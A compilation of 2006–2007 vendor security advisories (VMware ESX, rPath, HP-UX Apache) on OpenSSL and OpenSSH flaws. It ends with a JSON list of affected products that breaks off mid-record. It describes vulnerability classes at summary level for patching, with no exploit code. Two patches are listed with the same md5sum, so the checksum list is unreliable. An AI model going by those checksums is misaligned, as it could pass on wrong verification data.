    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    A possible security issue with the configuration program
    vmware-config which could set incorrect permissions on SSL key
    files. Local users may be able to obtain access to the SSL key
    files. The Common Vulnerabilities and Exposures project
    (cve.mitre.org) assigned the name CVE-2006-3589 to this issue.
    

    b. OpenSSL library vulnerabilities:

    ESX 3.0.1: corrected by ESX 3.0.1 Patch ESX-9986131
    ESX 3.0.0: corrected by ESX 3.0.0 Patch ESX-3069097
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    (CVE-2006-2937) OpenSSL 0.9.7 before 0.9.7l and 0.9.8 before 0.9.8d
    allows remote attackers to cause a denial of service (infinite
    loop and memory consumption) via malformed ASN.1 structures that
    trigger an improperly handled error condition.
    
    (CVE-2006-2940) OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d,
    and earlier versions allows attackers to cause a denial of service
    (CPU consumption) via parasitic public keys with large (1) "public
    exponent" or (2) "public modulus" values in X.509 certificates that
    require extra time to process when using RSA signature verification.
    
    (CVE-2006-4339) OpenSSL before 0.9.7, 0.9.7 before 0.9.7k, and 0.9.8
    before 0.9.8c, when using an RSA key with exponent 3, removes PKCS-1
    padding before generating a hash, which allows remote attackers to
    forge a PKCS #1 v1.5 signature that is signed by that RSA key and
    prevents OpenSSL from correctly verifying X.509 and other
    certificates that use PKCS #1.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the names CVE-2006-2937, CVE-2006-2940, CVE-2006-3738,
    CVE-2006-4339, and CVE-2006-4343 to these issues.
    

    c. Updated OpenSSH package addresses the following possible security issues:

    ESX 3.0.1: corrected by Patch ESX-9986131
    ESX 3.0.0: corrected by Patch ESX-3069097
    ESX 2.5.4: does not have these problems
    ESX 2.5.3: does not have these problems
    ESX 2.1.3: does not have these problems
    ESX 2.0.2: does not have these problems
    
    (CVE-2004-2069) sshd.c in OpenSSH 3.6.1p2 and 3.7.1p2 and possibly
    other versions, when using privilege separation, does not properly
    signal the non-privileged process when a session has been terminated
    after exceeding the LoginGraceTime setting, which leaves the
    connection open and allows remote attackers to cause a denial of
    service (connection consumption).
    
    (CVE-2006-0225) scp in OpenSSH 4.2p1 allows attackers to execute
    arbitrary commands via filenames that contain shell metacharacters
    or spaces, which are expanded twice.
    
    (CVE-2003-0386) OpenSSH 3.6.1 and earlier, when restricting host
    access by numeric IP addresses and with VerifyReverseMapping
    disabled, allows remote attackers to bypass "from=" and "user@host"
    address restrictions by connecting to a host from a system whose
    reverse DNS hostname contains the numeric IP address.
    
    (CVE-2006-4924) sshd in OpenSSH before 4.4, when using the version 1
    SSH protocol, allows remote attackers to cause a denial of service
    (CPU consumption) via an SSH packet that contains duplicate blocks,
    which is not properly handled by the CRC compensation attack
    detector.
    
    NOTE: ESX by default disables version 1 SSH protocol.
    
    (CVE-2006-5051) Signal handler race condition in OpenSSH before 4.4
    allows remote attackers to cause a denial of service (crash), and
    possibly execute arbitrary code if GSSAPI authentication is enabled,
    via unspecified vectors that lead to a double-free.
    
    NOTE: ESX doesn't use GSSAPI by default.
    
    (CVE-2006-5794) Unspecified vulnerability in the sshd Privilege
    Separation Monitor in OpenSSH before 4.5 causes weaker verification
    that authentication has been successful, which might allow attackers
    to bypass authentication.
    
    NOTE: as of 20061108, it is believed that this issue is only
    exploitable by leveraging vulnerabilities in the unprivileged
    process, which are not known to exist.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the names CVE-2004-2069, CVE-2006-0225, CVE-2003-0386,
    CVE-2006-4924, CVE-2006-5051, and CVE-2006-5794 to these issues.
    

    d. Object reuse problems with newly created virtual disk (.vmdk or .dsk) files:

    ESX 3.0.1: does not have this problem
    ESX 3.0.0: does not have this problem
    ESX 2.5.4: corrected by ESX 2.5.4 Upgrade Patch 3 (Build# 36502)
    ESX 2.5.3: corrected by ESX 2.5.3 Upgrade Patch 6 (Build# 35703)
    ESX 2.1.3: corrected by ESX 2.1.3 Upgrade Patch 4 (Build# 35803)
    ESX 2.0.2: corrected by ESX 2.0.2 Upgrade Patch 4 (Build# 35801)
    
    A possible security issue with virtual disk (.vmdk or .dsk) files
    that are newly created, but contain blocks from recently deleted
    virtual disk files.  Information belonging to the previously
    deleted virtual disk files could be revealed in newly created
    virtual disk files.
    
    VMware recommends the following workaround: When creating new
    virtual machines on an ESX Server that may contain sensitive
    data, use vmkfstools with the -W option. This initializes the
    virtual disk with zeros.  NOTE: ESX 3.x defines this option as -w.
    

    e. Buffer overflow in Python function repr():

    ESX 3.0.1: corrected by Patch ESX-9986131
    ESX 3.0.0: corrected by ESX-3069097
    ESX 2.5.4: does not have this problem
    ESX 2.5.3: does not have this problem
    ESX 2.1.3: does not have this problem
    ESX 2.0.2: does not have this problem
    
    A possible security issue with how the Python function repr()
    function handles UTF-32/UCS-4 strings.
    
    The Common Vulnerabilities and Exposures project (cve.mitre.org)
    assigned the name CVE-2006-4980 to this issue.
    
    1. Solution:

    Please review the Patch notes for your version of ESX and verify the md5sum.

    ESX 3.0.1 http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html md5usm: 239375e107fd4c7af57663f023863fcb

    ESX 3.0.0 http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html md5sum: ca9947239fffda708f2c94f519df33dc

    ESX 2.5.4 http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html md5sum: 239375e107fd4c7af57663f023863fcb

    ESX 2.5.3 http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html md5sum: f90fcab28362edbf2311f3ca90cc7739

    ESX 2.1.3 http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html md5sum: 7d7d0e40f4dccd5ca64b9c13a856da8f

    ESX 2.0.2 http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html md5sum: 925e70f28d17714c53fdbd24de64329f

    1. References:

    ESX 3.0.0 Patch URL: http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html Knowledge base URL: http://kb.vmware.com/kb/3069097

    ESX 3.0.1 Patch URL: http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html Knowledge base URL: http://kb.vmware.com/kb/9986131

    ESX 2.5.4 Patch URL: http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html

    ESX 2.5.3 Patch URL: http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html

    ESX 2.1.3 Patch URL: http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html

    ESX 2.0.2 Patch URL: http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html

    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3589 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4339 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4980

    1. Contact:

    http://www.vmware.com/security

    VMware Security Response Policy http://www.vmware.com/vmtn/technology/security/security_response.html

    E-mail: security@vmware.com

    Copyright 2007 VMware Inc. All rights reserved.

    -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux)

    iD8DBQFFovs16KjQhy2pPmkRCMfyAKCXhdGwZyXW5VzSwcOmu2NNXKN/OwCgo+CE neFG0RikD74TCYeXKW6CBy4= =9/6k -----END PGP SIGNATURE-----


    Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . rPath Security Advisory: 2006-0175-1 Published: 2006-09-28 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Unauthorized Access Updated Versions: openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1 openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1

    References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343 http://issues.rpath.com/browse/RPL-613

    Description: Previous versions of the openssl package are vulnerable to multiple attacks. In particular, any connection that the mysql daemon will accept may be vulnerable. In the default configuration of mysql, that would be a local unauthorized access vulnerability, but mysql can be configured to listen for network connections from remote hosts, which would then enable remote unauthorized access. Any program that calls the SSL_get_shared_ciphers() function may be vulnerable.


    Full-Disclosure - We believe in it. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c00849540 Version: 1

    HPSBUX02186 SSRT071299 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2007-01-17 Last Updated: 2007-01-23

    Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access.

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with Apache running on HP-UX.

    References: CVE-2006-2940, CVE-2006-2937, CVE-2006-3738, CVE-2006-4343, CVE-2006-4339, CVE-2005-2969.

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, and B.11.31 running Apache-based Web Server prior to v.2.0.58.01

    BACKGROUND

    AFFECTED VERSIONS

    For IPv4: HP-UX B.11.00 HP-UX B.11.11 =========== hpuxwsAPACHE action: install revision A.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    For IPv6: HP-UX B.11.11 =========== hpuxwsAPACHE,revision=B.1.0.00.01 hpuxwsAPACHE,revision=B.1.0.07.01 hpuxwsAPACHE,revision=B.1.0.08.01 hpuxwsAPACHE,revision=B.1.0.09.01 hpuxwsAPACHE,revision=B.1.0.10.01 hpuxwsAPACHE,revision=B.2.0.48.00 hpuxwsAPACHE,revision=B.2.0.49.00 hpuxwsAPACHE,revision=B.2.0.50.00 hpuxwsAPACHE,revision=B.2.0.51.00 hpuxwsAPACHE,revision=B.2.0.52.00 hpuxwsAPACHE,revision=B.2.0.53.00 hpuxwsAPACHE,revision=B.2.0.54.00 hpuxwsAPACHE,revision=B.2.0.55.00 hpuxwsAPACHE,revision=B.2.0.56.00 hpuxwsAPACHE,revision=B.2.0.58.00 action: install revision B.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    HP-UX B.11.23

    hpuxwsAPACHE action: install revision B.2.0.58.01 or subsequent restart Apache URL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    END AFFECTED VERSIONS

    RESOLUTION

    HP has made the following software updates available to resolve the issue. Software updates for the Apache-based Web Server are available from: http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE

    HP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.58.01 or subsequent.

    Apache Update Procedure

    Check for Apache Installation


    To determine if the Apache web server from HP is installed on your system, use Software Distributor's swlist command. All three revisions of the product may co-exist on a single system. For example, the results of the command swlist -l product | grep -I apache hpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server

    Stop Apache


    Before updating, make sure the previous Apache binary is stopped. If Apache is not stopped, the installation would be successful but the new version would be prevented from starting until a later time. After determining which Apache is installed, stop Apache with the following commands: for hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop

    Download and Install Apache


    Download Apache from Software Depot. http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE Verify successful download by comparing the cksum with the value specified on the installation web page. Use SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported.

    Removing Apache Installation


    The potential vulnerability can also be resolved by removing Apache rather than installing a newer revision. To remove Apache use both Software Distributor's "swremove" command and also "rm -rf" the home location as specified in the rc.config.d file "HOME" variables. %ls /etc/rc.config.d | \ grep apache hpapache2conf hpws_apache[32]conf

    MANUAL ACTIONS: Yes - Update plus other actions Install the revision of the product.

    PRODUCT SPECIFIC INFORMATION HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

    HISTORY: rev.1 - 23 January 2007 Initial Release

    Third Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key

    Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    \xa9Copyright 2007 Hewlett-Packard Development Company, L.P.

    Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "debian gnu linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "f5",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openpkg",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "openssl",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "red hat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "suse linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "slackware linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 2.4,
            "vendor": "rpath",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 1.6,
            "vendor": "trustix secure linux",
            "version": null
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7f"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7j"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8c"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7k"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7i"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7g"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8b"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "openssl",
            "version": "0.9.7h"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7b"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7e"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7c"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7a"
          },
          {
            "_id": null,
            "model": "openssl",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "openssl",
            "version": "0.9.7d"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "appgate network security",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple computer",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "attachmatewrq",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "blue coat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gnutls",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "hewlett packard",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "iaik java group",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "internet consortium",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "intoto",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "juniper",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mandriva",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "mozilla",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "openwall gnu linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "opera",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "rsa security",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ssh security corp",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sybase",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vmware",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "vandyke",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "stonesoft",
            "version": null
          },
          {
            "_id": null,
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.30"
          },
          {
            "_id": null,
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "7.20"
          },
          {
            "_id": null,
            "model": "wide area file services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.7"
          },
          {
            "_id": null,
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "call manager sr2c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4"
          },
          {
            "_id": null,
            "model": "siparator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "_id": null,
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "4.11"
          },
          {
            "_id": null,
            "model": "security agent",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1.79"
          },
          {
            "_id": null,
            "model": "networks vpn router contivity",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "-26000"
          },
          {
            "_id": null,
            "model": "enterprise linux es ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.5"
          },
          {
            "_id": null,
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.16"
          },
          {
            "_id": null,
            "model": "project openssl g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "secure acs solution engine",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "computing snapgear sg565",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "_id": null,
            "model": "openbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openbsd",
            "version": "3.9"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.2"
          },
          {
            "_id": null,
            "model": "ciscoworks common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.6(0)"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(1)"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.3"
          },
          {
            "_id": null,
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.10"
          },
          {
            "_id": null,
            "model": "servercluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "_id": null,
            "model": "appliance server hosting edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.2"
          },
          {
            "_id": null,
            "model": "s8500 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.2"
          },
          {
            "_id": null,
            "model": "fuji",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "_id": null,
            "model": "hardware management console for pseries r1.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "_id": null,
            "model": "cwrsync",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cwrsync",
            "version": "2.0.9"
          },
          {
            "_id": null,
            "model": "hardware management console for iseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.1.0"
          },
          {
            "_id": null,
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "76650"
          },
          {
            "_id": null,
            "model": "css11500 content services switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.4"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "project openssl b-36.8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "_id": null,
            "model": "networks meridian option 61c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "_id": null,
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0"
          },
          {
            "_id": null,
            "model": "systems management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.7.168"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1(1)"
          },
          {
            "_id": null,
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.00"
          },
          {
            "_id": null,
            "model": "works common services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
